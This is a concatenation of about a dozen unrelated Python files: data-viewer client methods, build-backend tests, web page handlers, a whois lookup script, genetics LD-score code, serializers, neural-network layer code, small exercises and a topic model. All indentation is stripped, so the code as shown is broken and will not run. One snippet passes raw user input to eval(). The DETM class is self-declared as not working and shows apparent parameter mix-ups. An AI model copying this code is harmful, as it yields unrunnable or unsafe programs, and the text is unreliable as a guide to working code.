client (:obj:`PerspectiveClient`): A `PerspectiveClient` that is
set up to send messages to a Perspective server implementation
elsewhere.
name (:obj:`str`): a `str` name for the View. Automatically
generated if using the `view` function defined above.
"""
self._client = client
self._name = name
self._async_queue = partial(async_queue, self._client, self._name)
self._subscribe = partial(subscribe, self._client, self._name)
self._unsubscribe = partial(unsubscribe, self._client, self._name)
def get_config(self):
return self._async_queue("get_config", "view_method")
def sides(self):
return self._async_queue("sides", "view_method")
def num_rows(self):
return self._async_queue("num_rows", "view_method")
def num_columns(self):
return self._async_queue("num_columns", "view_method")
def get_min_max(self):
return self._async_queue("get_min_max", "view_method")
def get_row_expanded(self, idx):
return self._async_queue("get_row_expanded", "view_method", idx)
def expand(self, idx):
return self._async_queue("expand", "view_method", idx)
def collapse(self, idx):
return self._async_queue("collapse", "view_method", idx)
def set_depth(self, idx):
return self._async_queue("set_depth", "view_method", idx)
def column_paths(self):
return self._async_queue("column_paths", "view_method")
def schema(self, as_string=False):
return self._async_queue("schema", "view_method", as_string=as_string)
def expression_schema(self, as_string=False):
return self._async_queue(
"expression_schema", "view_method", as_string=as_string
)
def on_update(self, callback, mode=None):
return self._subscribe("on_update", "view_method", callback, mode=mode)
def remove_update(self, callback):
return self._unsubscribe("remove_update", "view_method", callback)
def on_delete(self, callback):
return self._subscribe("on_delete", "view_method", callback)
def remove_delete(self, callback):
return self._unsubscribe("remove_delete", "view_method", callback)
def delete(self):
return self._async_queue("delete", "view_method")
def to_arrow(self, **kwargs):
return self._async_queue("to_arrow", "view_method", **kwargs)
def to_records(self, **kwargs):
return self._async_queue("to_records", "view_method", **kwargs)
def to_dict(self, **kwargs):
return self._async_queue("to_dict", "view_method", **kwargs)
def to_numpy(self, **kwargs):
return self._async_queue("to_numpy", "view_method", **kwargs)
def to_df(self, **kwargs):
return self._async_queue("to_df", "view_method", **kwargs)
def to_csv(self, **kwargs):
return self._async_queue("to_csv", "view_method", **kwargs)
def to_json(self, **kwargs):
return self._async_queue("to_json", "view_method", **kwargs)
def to_columns(self, **kwargs):
return self._async_queue("to_columns", "view_method", **kwargs)
|
import unittest
from pathlib import Path
import volatile
from ..flit import FlitReader
from ..pep517 import get_backend
from ..setuptools import SetuptoolsReader
class Pep517Test(unittest.TestCase):
def test_no_backend(self) -> None:
with volatile.dir() as d:
dp = Path(d)
requires, inst = get_backend(dp)
# self.assertEqual(["setuptools"], requires)
self.assertIsInstance(inst, SetuptoolsReader)
def test_setuptools_backend(self) -> None:
with volatile.dir() as d:
dp = Path(d)
Path(d, "pyproject.toml").write_text("")
requires, inst = get_backend(dp)
# self.assertEqual(["setuptools"], requires)
self.assertIsInstance(inst, SetuptoolsReader)
def test_flit_backend(self) -> None:
with volatile.dir() as d:
dp = Path(d)
Path(d, "pyproject.toml").write_text(
"""\
[build-system]
requires = ["flit_core >=2,<4"]
build-backend = "flit_core.buildapi"
"""
)
requires, inst = get_backend(dp)
self.assertEqual(["flit_core >=2,<4"], requires)
self.assertIsInstance(inst, FlitReader)
|
"""Web frontend functions for stand-alone running."""
import typing
import aiohttp.web
from cryptography.fernet import InvalidToken
from swift_browser_ui.ui.settings import setd
from swift_browser_ui.ui._convenience import session_check
async def browse(request: aiohttp.web.Request) -> aiohttp.web.FileResponse:
"""Serve the browser SPA when running without a proxy."""
session_check(request)
response = aiohttp.web.FileResponse(
str(setd["static_directory"]) + "/browse.html",
headers={
"Cache-Control": "no-cache, no-store, must-revalidate",
"Pragma": "no-cache",
"Expires": "0",
},
)
return response
async def index(
request: typing.Optional[aiohttp.web.Request],
) -> typing.Union[aiohttp.web.Response, aiohttp.web.FileResponse]:
"""Serve the index page when running without a proxy."""
try:
if request is not None:
session_check(request)
request.app["Log"].info("Redirecting an existing session to app")
return aiohttp.web.Response(
status=303,
headers={
"Location": "/browse",
},
)
else:
raise AttributeError
except (AttributeError, InvalidToken, KeyError, aiohttp.web.HTTPUnauthorized):
return aiohttp.web.FileResponse(str(setd["static_directory"]) + "/index.html")
async def loginpassword(
request: typing.Optional[aiohttp.web.Request],
) -> typing.Union[aiohttp.web.Response, aiohttp.web.FileResponse]:
"""Serve the username and password login page."""
try:
if request is not None:
session_check(request)
request.app["Log"].info("Redirecting an existing session to app")
return aiohttp.web.Response(
status=303,
headers={
"Location": "/browse",
},
)
else:
raise AttributeError
except (AttributeError, InvalidToken, KeyError, aiohttp.web.HTTPUnauthorized):
return aiohttp.web.FileResponse(
str(setd["static_directory"]) + "/loginpassword.html"
)
|
#!/usr/bin/python
##################################################
## Author: Joshua Franklin
## whoarethey.py
## Example input to start:
## sudo ./whoarethey.py -f someFileNmae
## The file name should contain an electionBuster results file
## This code relies on a library from Google: https://code.google.com/p/pywhois/
##################################################
import sys
import string
import argparse
import whois
# Function: casts and removes those pesky \r and \n
def stringAndStrip(input):
input = str(input)
input = input.rstrip()
return input
#Parse command line arguments
parser = argparse.ArgumentParser(description='Pulls down whois information by parsing an electionBuster.py results file')
parser.add_argument('-f','--fileName', help='Name of electionBuster results file', required=True)
args = parser.parse_args()
# Stores command line arguments
# Make all lowercase
fileName = args.fileName
#open inputFile
with open(fileName, 'r') as inputFile:
lines = list(inputFile)
#open and clear output file
tempResults = 'WHOIS-' + str(fileName)
resultsFile = open(tempResults, "w")
# This clears the results files before reopening them
resultsFile.close()
resultsFile = open(tempResults, "w")
# Instantiating some variables
totalLines = 0
index = 0
positiveResultsLine = 0
numberOfHits = 0
URLlist = []
'''
#grabbing total number of lines the file
for line in lines:
print lines + '\n'
totalLines = totalLines + 1
#finding the line right before the results appear in the file
for line in lines:
if line[0:13] == 'Total runtime':
positiveResultsLine = index
else:
index = index + 1
'''
# setting up some more variables
numberOfHits = stringAndStrip(numberOfHits)
numberOfHits = int(numberOfHits)
positiveResultsLine = positiveResultsLine + 1
hitString = lines[positiveResultsLine]
hitCount = 0
newList = []
'''
#increment where we found the results to where URL begin
positiveResultsLine = positiveResultsLine + 5
#parse the hitstring for the number of hits
numberOfHits = hitString[11:13]
index = 0
# parse out the URLs - ridiculously difficult
for line in lines:
index = index + 1
if index == positiveResultsLine:
hitCount = int(numberOfHits)
URLlist.append(line)
hitCount = int(hitCount) - 1
positiveResultsLine = positiveResultsLine + 1
numberOfHits = int(numberOfHits) - 1
if hitCount <= 0:
break
# having some issues with spaces and a dashed line from results file
# basically removing the spaces and dashes, and skipping the first line b/c that's a dash I couldn't get away from
flag = 0
for url in URLlist:
if flag != 0:
url = stringAndStrip(url)
if url != ' ' or '-------------------------------------':
newList.append(url)
flag = flag + 1
'''
#setup to write to file
resultsFile.write('electionBuster WHOIS results' + "\n")
resultsFile.write('whoAreThey v2' + "\n")
resultsFile.write('###############################' + "\n")
resultsFile.write("\n")
#final processing, lookup, and writing to logfile
for line in lines:
url = stringAndStrip(line)
print url + "\n"
resultsFile.write('-------------------------------------')
resultsFile.write("\n")
resultsFile.write(str(url) + "\n")
w = whois.whois(url)
resultsFile.write(str(w) + "\n")
print w
print "\n"
resultsFile.write('-------------------------------------')
resultsFile.write("\n")
# Bad things happen if these files are not properly closed
resultsFile.close()
|
class Solution:
def isIsomorphic(self, s: str, t: str) -> bool:
hashmap = {}
hashset = set()
for i in range(len(s)):
if s[i] not in hashmap:
if t[i] in hashset:
return False
elif hashmap[s[i]] != t[i]:
return False
hashmap[s[i]] = t[i]
hashset.add(t[i])
return True |
#!/usr/bin/env python3
# coding: utf-8
__author__ = 'mkanai'
import argparse
import atexit
import numpy as np
import hail as hl
import uuid
from hail.linalg import BlockMatrix
from hail.utils import new_temp_file, hadoop_open, timestamp_path
from ukbb_pan_ancestry.resources import get_filtered_mt, get_variant_results_qc_path, POPS, temp_bucket
from ukbb_pan_ancestry.resources.ld import *
def new_gs_temp_path():
return f'{temp_bucket}/{str(uuid.uuid4())}'
def checkpoint_tmp(hail_obj, path=None, overwrite=False, force_row_major=False):
if path is None:
path = new_gs_temp_path()
if isinstance(hail_obj, BlockMatrix):
return hail_obj.checkpoint(path, overwrite=overwrite, force_row_major=force_row_major)
else:
return hail_obj.checkpoint(path, overwrite=overwrite)
def normalize_bm(bm):
n = bm.shape[1]
m1 = checkpoint_tmp(bm.sum(axis=1))
m2 = checkpoint_tmp((bm**2).sum(axis=1))
mean = m1 / n
# biased is n; unbiased is n - 1
stdev = ((m2 - m1**2 / n) / n).sqrt()
# add a min float value to prevent zero division due to machine precision; 3.35e-14
bm_norm = ((bm - mean) / (stdev + 1.18e-38))
return bm_norm
# cf. https://github.com/Nealelab/UK_Biobank_GWAS/blob/master/0.2/create_ldsc_hm3_table.py
def write_ldsc_hm3_snplist(info_threshold=0.9, maf_threshold=0.01, overwrite=False):
# Filter variants
ht = hl.read_table(get_variant_results_qc_path())
# in autosomes
ht = ht.filter(ht.locus.in_autosome())
# no MHC
ht = ht.filter(~hl.parse_locus_interval('6:28477797-33448354').contains(ht.locus))
# info > 0.9
ht = ht.filter(ht.info > info_threshold)
# SNP only
ht = ht.filter(hl.is_snp(ht.alleles[0], ht.alleles[1]))
# no multi-allelic sites
loc_count = ht.group_by(ht.locus).aggregate(nloc=hl.agg.count())
loc_count = loc_count.filter(loc_count.nloc > 1)
multi_sites = loc_count.aggregate(hl.agg.collect_as_set(loc_count.locus), _localize=False)
ht = ht.filter(~multi_sites.contains(ht.locus))
# in HM3
hm3_snps = hl.read_table('gs://ukbb-ldsc-dev/ukb_hm3_snplist/hm3.r3.b37.auto_bi_af.ht')
hm3_snps = hm3_snps.select()
ht = ht.join(hm3_snps, 'right')
# no strand ambiguity
ht = ht.filter(~hl.is_strand_ambiguous(ht.alleles[0], ht.alleles[1]))
ht = checkpoint_tmp(ht)
def get_maf(af):
return 0.5 - hl.abs(0.5 - af)
# MAF > 1% in UKB & gnomad genome/exome (if defined) for each population
for pop in POPS:
snplist = ht.filter(
hl.rbind(
ht.freq[ht.freq.index(lambda x: x.pop == pop)], lambda y: (get_maf(y.af) > maf_threshold) &
(hl.is_missing(y.gnomad_genomes_af) | (get_maf(y.gnomad_genomes_af) > maf_threshold)) &
(hl.is_missing(y.gnomad_exomes_af) | (get_maf(y.gnomad_exomes_af) > maf_threshold))))
snplist = snplist.select('rsid')
snplist.write(get_hm3_snplist_path(pop), overwrite=overwrite)
# cf: https://github.com/broadinstitute/gnomad_qc/blob/master/gnomad_qc/v2/annotations/generate_ld_data.py
def copmute_ldscore(ht, bm_ld, n, radius, out_name, overwrite):
r2 = bm_ld**2
r2_adj = ((n - 1.0) / (n - 2.0)) * r2 - (1.0 / (n - 2.0))
# This is required, as the squaring/multiplication densifies, so this re-sparsifies.
starts_and_stops = hl.linalg.utils.locus_windows(ht.locus, radius, _localize=False)
r2_adj = r2_adj._sparsify_row_intervals_expr(starts_and_stops, blocks_only=False)
r2_adj = r2_adj.sparsify_triangle()
r2_adj = checkpoint_tmp(r2_adj)
# Note that the original ld matrix is triangular
l2row = checkpoint_tmp(r2_adj.sum(axis=0)).T
l2col = checkpoint_tmp(r2_adj.sum(axis=1))
r2_diag = checkpoint_tmp(r2_adj.diagonal()).T
l2 = l2row + l2col - r2_diag
l2_bm_tmp = new_temp_file()
l2_tsv_tmp = new_gs_temp_path()
l2.write(l2_bm_tmp, force_row_major=True)
BlockMatrix.export(l2_bm_tmp, l2_tsv_tmp)
ht_scores = hl.import_table(l2_tsv_tmp, no_header=True, impute=True)
ht_scores = ht_scores.add_index().rename({'f0': 'ld_score'})
ht_scores = ht_scores.key_by('idx')
ht = ht.add_index()
ht = ht.annotate(**ht_scores[ht.idx]).drop('idx')
ht = ht.checkpoint(out_name, overwrite)
return ht
def export_ldscore(ht, pop):
hm3_snps = hl.read_table(get_hm3_snplist_path(pop))
ht = ht.select(CHR=ht.locus.contig,
SNP=hl.variant_str(ht.locus, ht.alleles),
RSID=ht.rsid,
BP=ht.locus.position,
L2=ht.ld_score,
MAF=0.5 - hl.abs(0.5 - ht.AF))
count = ht.aggregate(hl.struct(M=hl.agg.count(), M_5_50=hl.agg.sum(ht.MAF > 0.05)))
ht = ht.filter(hl.is_defined(hm3_snps[ht.locus, ht.alleles]))
ht = ht.key_by().drop('locus', 'alleles', 'MAF')
with hadoop_open(get_ld_score_flat_file_path(pop, extension='M'), 'w') as f:
f.write(f'{count.M}\n')
with hadoop_open(get_ld_score_flat_file_path(pop, extension='M_5_50'), 'w') as f:
f.write(f'{count.M_5_50}\n')
# LD score with variant ids
ht.drop('RSID').export(get_ld_score_flat_file_path(pop))
# with rsids
ht.transmute(SNP=ht.RSID).export(get_ld_score_flat_file_path(pop, rsid=True))
def main(args):
pop = args.pop
num_pcs = 10
basic_covars = ['sex', 'age', 'age2', 'age_sex', 'age2_sex']
covariates = basic_covars + [f'PC{x}' for x in range(1, num_pcs + 1)]
tmp_mt_path = f'{temp_bucket}/{pop}.mt'
tmp_bm_path = f'{temp_bucket}/{pop}.bm'
if args.write_mt:
mt = get_filtered_mt(chrom='all', pop=pop, entry_fields=['dosage'], filter_mac_instead_of_ac=True)
mt = mt.annotate_rows(AF=hl.agg.mean(mt.dosage) / 2)
mt = mt.checkpoint(tmp_mt_path, overwrite=args.overwrite)
n = mt.count()[1]
# write variant indexes
ht = mt.rows().select().add_index()
ht = ht.annotate_globals(n_samples=n, pop=pop)
ht.write(get_ld_variant_index_path(pop), overwrite=args.overwrite)
else:
mt = hl.read_matrix_table(tmp_mt_path)
n = mt.count()[1]
if args.write_bm:
# convert mt to bm
BlockMatrix.write_from_entry_expr(mt.dosage,
tmp_bm_path,
mean_impute=True,
center=False,
normalize=False,
overwrite=args.overwrite)
else:
bm = BlockMatrix.read(tmp_bm_path)
if args.compute_ld_matrix:
print(f'BlockMatrix shape: {bm.shape}')
# mean-center and normalize bm
bm_norm = normalize_bm(bm)
bm_norm = checkpoint_tmp(bm_norm)
# take covariates (with intercept), make hat bms for FWL projection
cov = mt.cols().select(*covariates).to_pandas().drop(['s'], axis=1)
cov['Intercept'] = 1.0
hat1 = cov.values
hat2 = np.dot(np.linalg.inv(np.dot(cov.transpose(), cov)), cov.transpose())
bm_hat1 = checkpoint_tmp(BlockMatrix.from_numpy(hat1))
bm_hat2 = checkpoint_tmp(BlockMatrix.from_numpy(hat2))
# Cov-adjustement; conducting in three steps due to huge matrix operation
bm_Z = checkpoint_tmp(bm_norm @ bm_hat1)
bm_Z = checkpoint_tmp(bm_Z @ bm_hat2)
bm_Z = checkpoint_tmp(bm_norm - bm_Z)
# compute ld matrix with a specified radius
bm_ldadj = (bm_Z @ bm_Z.T) / n
starts_and_stops = hl.linalg.utils.locus_windows(mt.locus, radius=args.radius, _localize=False)
bm_ldadj = bm_ldadj._sparsify_row_intervals_expr(starts_and_stops, blocks_only=False)
# sparcify to a triangle matrix
bm_ldadj = bm_ldadj.sparsify_triangle()
bm_ldadj = bm_ldadj.checkpoint(get_ld_matrix_path(pop), overwrite=args.overwrite, force_row_major=True)
else:
bm_ldadj = BlockMatrix.read(get_ld_matrix_path(pop))
if args.write_ldsc_hm3_snplist:
# Note: currently, this writes snplists for all the populations at once
write_ldsc_hm3_snplist(overwrite=args.overwrite)
if args.compute_ldscore:
ht_ldscore = copmute_ldscore(mt.rows(),
bm_ldadj,
n,
radius=args.ld_score_radius,
out_name=get_ld_score_ht_path(pop),
overwrite=args.overwrite)
export_ldscore(ht_ldscore, pop)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--pop', type=str, required=True, help='Population to compute a LD matrix')
parser.add_argument('--radius', type=int, default=1e7, help='Radius of window for LD matrix')
parser.add_argument('--ld-score-radius', type=int, default=1e6, help='Radius of window for LD score')
parser.add_argument('--write-mt', action='store_true', help='Write MatrixTable from bgen')
parser.add_argument('--write-bm', action='store_true', help='Write BlockMatrix from MatrixTable')
parser.add_argument('--compute-ld-matrix', action='store_true', help='Compute LD matrix')
parser.add_argument('--compute-ldscore', action='store_true', help='Compute LD score')
parser.add_argument('--write-ldsc-hm3-snplist', action='store_true', help='Write QCed HM3 snplist for ldsc')
parser.add_argument('--overwrite', action='store_true', help='Overwrite data')
args = parser.parse_args()
atexit.register(lambda: hl.copy_log(timestamp_path(f'gs://ukb-diverse-pops/ld/{args.pop}/ld', suffix='.log')))
main(args)
|
from rest_framework import serializers
from rest_framework.reverse import reverse
from unifier.apps.core.models import Manga, Novel, Platform
class MangaPlatformSerializer(serializers.ModelSerializer):
class Meta:
model = Manga
fields = ["id", "title", "year", "chapters_count"]
class NovelPlatformSerializer(serializers.ModelSerializer):
class Meta:
model = Novel
fields = ["id", "title", "year", "chapters_count"]
class PlatformSerializer(serializers.ModelSerializer):
mangas = MangaPlatformSerializer(read_only=True, many=True)
novels = NovelPlatformSerializer(read_only=True, many=True)
platform_url = serializers.SerializerMethodField()
class Meta:
model = Platform
fields = [
"url",
"name",
"url_search",
"mangas",
"novels",
"platform_url",
]
def get_platform_url(self, obj):
return reverse("platform-detail", args=[obj.id])
class PlatformSerializerDetail(serializers.ModelSerializer):
mangas = MangaPlatformSerializer(read_only=True, many=True)
novels = NovelPlatformSerializer(read_only=True, many=True)
class Meta:
model = Platform
fields = PlatformSerializer.Meta.fields[:-1]
|
from abc import abstractmethod, ABCMeta
import numpy as np
from palmnet.layers.multi_conv2D import MultiConv2D
from palmnet.layers.multi_dense import MultiDense
from skluc.utils import logger
from tensorly.decomposition import matrix_product_state
from palmnet.core.layer_replacer import LayerReplacer
from palmnet.data import Cifar100
from palmnet.layers.tt_layer_conv import TTLayerConv
from palmnet.layers.tt_layer_dense import TTLayerDense
from collections import defaultdict
# from keras.layers import Dense, Conv2D
from palmnet.utils import build_dct_tt_ranks, get_facto_for_channel_and_order, DCT_CHANNEL_PREDEFINED_FACTORIZATIONS, TensortrainBadRankException
from tensorflow_model_optimization.sparsity import keras as sparsity
class LayerReplacerMulti(LayerReplacer):
def __init__(self, nb_factors, final_sparsity=0, end_step=None, frequency=100, init_sparsity=0.5, begin_step=0, *args, **kwargs):
self.nb_factors = nb_factors
self.final_sparsity = final_sparsity
if self.final_sparsity != 0:
self.pruning_params = {
'pruning_schedule': sparsity.PolynomialDecay(initial_sparsity=init_sparsity,
final_sparsity=final_sparsity,
begin_step=begin_step,
end_step=end_step,
frequency=frequency)
}
super().__init__(*args, **kwargs)
##################################
# LayerReplacer abstract methods #
##################################
def _apply_replacement(self, layer):
if isinstance(layer, self.keras_module.layers.Conv2D) or isinstance(layer, self.keras_module.layers.Dense):
dct_replacement = dict()
else:
dct_replacement = None
return dct_replacement
def _replace_conv2D(self, layer, dct_compression):
nb_filters = layer.filters
strides = layer.strides
kernel_size = layer.kernel_size
activation = layer.activation
padding = layer.padding
use_bias = layer.use_bias
replacing_layer = MultiConv2D(nb_factors=self.nb_factors, filters=nb_filters, use_bias=use_bias, kernel_size=kernel_size, strides=strides, padding=padding, activation=activation)
if self.final_sparsity != 0:
replacing_layer = sparsity.prune_low_magnitude(replacing_layer, **self.pruning_params)
replacing_weights = None
return replacing_layer, replacing_weights, True
def _replace_dense(self, layer, dct_compression):
hidden_layer_dim = layer.units
activation = layer.activation
use_bias = layer.use_bias
replacing_layer = MultiDense(units=hidden_layer_dim, nb_factors=self.nb_factors, use_bias=use_bias, activation=activation)
if self.final_sparsity != 0:
replacing_layer = sparsity.prune_low_magnitude(replacing_layer, **self.pruning_params)
replacing_weights = None
return replacing_layer, replacing_weights, True
def _set_weights_to_layer(self, replacing_layer, replacing_weights):
if replacing_weights is not None:
raise ValueError("Shouldn't have any weight for replacement.")
else:
return
|
import numpy as np
import statistics as st
"""
Enunciado
Crie uma função que recebe uma lista de números e devolve, nesta ordem, o mínimo, a média, o desvio padrão e o máximo.
Dica: Use a biblioteca statistics (import statistics) para calcular o desvio padrão: desvio = statistics.stdev(lista)
"""
lista = [6, 4, 3, 7, 8, 2, 9, 1]
def recebe_lista(lista):
print(f"Valor mínimo: {min(lista)}")
print(f"Valor médio: {np.mean(lista)}")
print(f"Desvio padrão: {st.stdev(lista):.2f}")
print(f"Valor máximo: {max(lista)}")
recebe_lista(lista) |
n = int(input())
answer = 0
for _ in range(n) :
exp = input()
answer = max(answer, eval(exp))
print(answer) |
# -*- coding: utf-8 -*-
# @Time : 2021/3/19 12:18 PM
import traceback
from flask import request, current_app
from werkzeug.exceptions import HTTPException
from app.api import route_api
from common.libs.customException import CustomException
from common.libs.api_result import api_result
@route_api.app_errorhandler(Exception)
def errors(e):
traceback.print_exc()
# current_app.logger.info('异常类型:', str(type(e)))
if isinstance(e, CustomException):
current_app.logger.info('-----CustomException-----')
# tb('-----CustomException-----')
return api_result(code=e.code, message='CustomException:【{}】'.format(str(e.msg)),
data=request.method + ' ' + request.path)
if isinstance(e, HTTPException) and (300 <= e.code < 600):
current_app.logger.info('-----HTTPException-----')
current_app.logger.info('===>path is not found: ' + request.path)
# tb('-----HTTPException-----')
return api_result(code=e.code, message='HTTPException:【{}】'.format(str(e)),
data=request.method + ' ' + request.path)
else:
current_app.logger.info('-----Exception-----')
# tb('-----Exception-----')
return api_result(code=500, message='Exception:【{}】'.format(str(e)), data=request.method + ' ' + request.path)
|
from jsut.corpus import Subtype
from typing import Callable, List, Optional, Union
import pytorch_lightning as pl
from torch.tensor import Tensor
from torch.utils.data import random_split, DataLoader
from ...dataset.spectrogram import JSUT_spec
class JSUT_spec_DataModule(pl.LightningDataModule):
"""
JSUT_spec dataset's PyTorch Lightning datamodule
"""
def __init__(
self,
batch_size: int,
download: bool,
subtypes: List[Subtype] = ["basic5000"],
transform: Callable[[Tensor], Tensor] = lambda i: i,
corpus_adress: Optional[str] = None,
dataset_dir_adress: Optional[str] = None,
resample_sr: Optional[int] = None,
):
super().__init__()
self.n_batch = batch_size
self.download = download
self._subtypes = subtypes
self.transform = transform
self.corpus_adress = corpus_adress
self._dataset_dir_adress = dataset_dir_adress
self._resample_sr = resample_sr
def prepare_data(self, *args, **kwargs) -> None:
pass
def setup(self, stage: Union[str, None] = None) -> None:
if stage == "fit" or stage is None:
dataset_train = JSUT_spec(
train=True,
resample_sr=self._resample_sr,
subtypes=self._subtypes,
download_corpus=self.download,
corpus_adress=self.corpus_adress,
dataset_dir_adress=self._dataset_dir_adress,
transform=self.transform,
)
n_train = len(dataset_train)
self.data_train, self.data_val = random_split(
dataset_train, [n_train - 10, 10]
)
if stage == "test" or stage is None:
self.data_test = JSUT_spec(
train=False,
resample_sr=self._resample_sr,
subtypes=self._subtypes,
download_corpus=self.download,
corpus_adress=self.corpus_adress,
dataset_dir_adress=self._dataset_dir_adress,
transform=self.transform,
)
def train_dataloader(self, *args, **kwargs):
return DataLoader(self.data_train, batch_size=self.n_batch)
def val_dataloader(self, *args, **kwargs):
return DataLoader(self.data_val, batch_size=self.n_batch)
def test_dataloader(self, *args, **kwargs):
return DataLoader(self.data_test, batch_size=self.n_batch)
if __name__ == "__main__":
print("This is datamodule/waveform.py")
# If you use batch (n>1), transform function for Tensor shape rearrangement is needed
dm_npVCC_spec = JSUT_spec_DataModule(1, download=True)
# download & preprocessing
dm_npVCC_spec.prepare_data()
# runtime setup
dm_npVCC_spec.setup(stage="fit")
# yield dataloader
dl = dm_npVCC_spec.train_dataloader()
print(next(iter(dl)))
print("datamodule/waveform.py test passed") |
from octis.models.DETM_model import detm
from octis.models.base_etm import BaseETM
from octis.models.DETM_model import data
import torch
import warnings
class DETM(BaseETM):
def __init__(self, num_topics=50, rho_size=300, embedding_size=300, t_hidden_size=800,
activation='relu', train_embeddings=1, eta_nlayers=3, eta_hidden_size=200,
delta=0.005, device='cpu', lr_factor=4.0, lr=0.005, anneal_lr=1, batch_size=100,
num_epochs=100, seed=2019, dropout=0.0, eta_dropout=0.0, clip=0.0,
nonmono=10, optimizer='adam', wdecay=1.2e-6, embeddings_path="", use_partitions=True):
warnings.simplefilter('always', Warning)
warnings.warn("Don't use this because it doesn't work :)",
Warning)
super(DETM, self).__init__()
self.hyperparameters = dict()
self.hyperparameters['num_topics'] = int(num_topics)
self.hyperparameters['num_epochs'] = int(num_epochs)
self.hyperparameters['t_hidden_size'] = int(t_hidden_size)
self.hyperparameters['rho_size'] = int(rho_size)
self.hyperparameters['embedding_size'] = int(embedding_size)
self.hyperparameters['activation'] = activation
self.hyperparameters['eta_nlayers'] = eta_nlayers
self.hyperparameters['eta_hidden_size'] = eta_hidden_size
self.hyperparameters['delta'] = delta
self.hyperparameters['dropout'] = float(dropout)
self.hyperparameters['lr'] = float(lr)
self.hyperparameters['lr_factor'] = float(lr)
self.hyperparameters['anneal_lr'] = float(anneal_lr)
self.hyperparameters['optimizer'] = optimizer
self.hyperparameters['batch_size'] = int(batch_size)
self.hyperparameters['clip'] = float(clip)
self.hyperparameters['wdecay'] = float(wdecay)
self.hyperparameters['eta_dropout'] = float(eta_dropout)
self.hyperparameters['seed'] = int(seed)
self.hyperparameters['clip'] = int(clip)
self.hyperparameters['nonmono'] = int(nonmono)
self.hyperparameters['train_embeddings'] = bool(train_embeddings)
self.hyperparameters['embeddings_path'] = embeddings_path
self.device = device
self.early_stopping = None
# TODO: this we need to agree on this
self.test_tokens, self.test_counts = None, None
self.valid_tokens, self.valid_counts = None, None
self.train_tokens, self.train_counts, self.vocab = None, None, None
self.use_partitions = use_partitions
self.model = None
self.optimizer = None
self.embeddings = None
# are they enough or we need more
def set_model(self, dataset, hyperparameters):
if self.use_partitions:
train_data, validation_data, testing_data = dataset.get_partitioned_corpus(use_validation=True)
data_corpus_train = [' '.join(i) for i in train_data]
data_corpus_test = [' '.join(i) for i in testing_data]
data_corpus_val = [' '.join(i) for i in validation_data]
vocab = dataset.get_vocabulary()
self.vocab = {i: w for i, w in enumerate(vocab)}
vocab2id = {w: i for i, w in enumerate(vocab)}
self.train_tokens, self.train_counts, self.test_tokens, self.test_counts, self.valid_tokens, \
self.valid_counts = self.preprocess(vocab2id, data_corpus_train, data_corpus_test, data_corpus_val)
else:
data_corpus = [' '.join(i) for i in dataset.get_corpus()]
vocab = dataset.get_vocabulary()
self.vocab = {i: w for i, w in enumerate(vocab)}
vocab2id = {w: i for i, w in enumerate(vocab)}
self.train_tokens, self.train_counts = self.preprocess(vocab2id, data_corpus, None)
self.device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
self.set_default_hyperparameters(hyperparameters)
self.load_embeddings()
## define model and optimizer
self.model = detm.DETM(num_topics=self.hyperparameters['num_topics'],
num_times=self.hyperparameters['num_times'],
vocab_size=len(self.vocab.keys()),
t_hidden_size=int(self.hyperparameters['t_hidden_size']),
eta_hidden_size=int(self.hyperparameters['eta_hidden_size']),
rho_size=int(self.hyperparameters['rho_size']),
emb_size=int(self.hyperparameters['embedding_size']),
theta_act=self.hyperparameters['activation'],
eta_nlayers=self.hyperparameters['eta_nlayers'],
delta=self.hyperparameters['eta_nlayers'],
embeddings=self.embeddings,
train_embeddings=self.hyperparameters['train_embeddings'],
enc_drop=self.hyperparameters['dropout']).to(self.device)
print('model: {}'.format(self.model))
self.optimizer = self.set_optimizer()
def _train_epoch(self, epoch):
"""
Train the model for the given epoch
"""
# change to the way we are loading data the correct form .. @ask sylvia
train_data_with_time = None
train_data, train_times = data.get_time_columns(train_data_with_time)
self.train_rnn_inp = data.get_rnn_input(
self.train_tokens, self.train_counts, train_times, self.hyperparameters['num_times'], len(self.vocab),
len(self.train_tokens))
self.model.train()
acc_loss = 0
acc_nll = 0
acc_kl_theta_loss = 0
acc_kl_eta_loss = 0
acc_kl_alpha_loss = 0
cnt = 0
indices = torch.randperm(train_data.shape[0])
indices = torch.split(indices, self.hyperparameters['batch_size'])
optimizer = self.set_optimizer()
for idx, ind in enumerate(indices):
optimizer.zero_grad()
self.zero_grad()
data_batch, times_batch = data.get_batch(train_data, ind, self.device,
train_times) # we can use pytorch data loader here
### I comment the following row just because I need to make the code compile :/
# times_batch = get_indices(train_times, times_batch)
sums = data_batch.sum(1).unsqueeze(1)
times_batch = torch.from_numpy(times_batch)
if self.hyperparameters['bow_norm']:
normalized_data_batch = data_batch / sums
else:
normalized_data_batch = data_batch
loss, nll, kl_alpha, kl_eta, kl_theta = self.model.forward(
data_batch, normalized_data_batch, times_batch, self.train_rnn_inp, train_data.shape[0])
loss.backward()
if self.hyperparameters['clip'] > 0:
torch.nn.utils.clip_grad_norm_(self.parameters(), self.hyperparameters['clip'])
optimizer.step()
acc_loss += torch.sum(loss).item()
acc_nll += torch.sum(nll).item()
acc_kl_theta_loss += torch.sum(kl_theta).item()
acc_kl_eta_loss += torch.sum(kl_eta).item()
acc_kl_alpha_loss += torch.sum(kl_alpha).item()
cnt += 1
if idx % self.hyperparameters['log_interval'] == 0 and idx > 0:
cur_loss = round(acc_loss / cnt, 2)
cur_nll = round(acc_nll / cnt, 2)
cur_kl_theta = round(acc_kl_theta_loss / cnt, 2)
cur_kl_eta = round(acc_kl_eta_loss / cnt, 2)
cur_kl_alpha = round(acc_kl_alpha_loss / cnt, 2)
lr = optimizer.param_groups[0]['lr']
print(
'Epoch: {} .. batch: {}/{} .. LR: {} .. KL_theta: {} .. KL_eta: {} .. KL_alpha: {} .. Rec_loss: {} .. NELBO: {}'.format(
epoch, idx, len(indices), lr, cur_kl_theta, cur_kl_eta, cur_kl_alpha, cur_nll, cur_loss))
cur_loss = round(acc_loss / cnt, 2)
cur_nll = round(acc_nll / cnt, 2)
cur_kl_theta = round(acc_kl_theta_loss / cnt, 2)
cur_kl_eta = round(acc_kl_eta_loss / cnt, 2)
cur_kl_alpha = round(acc_kl_alpha_loss / cnt, 2)
lr = optimizer.param_groups[0]['lr']
print('*' * 100)
print(
'Epoch----->{} .. LR: {} .. KL_theta: {} .. KL_eta: {} .. KL_alpha: {} .. Rec_loss: {} .. NELBO: {}'.format(
epoch, lr, cur_kl_theta, cur_kl_eta, cur_kl_alpha, cur_nll, cur_loss))
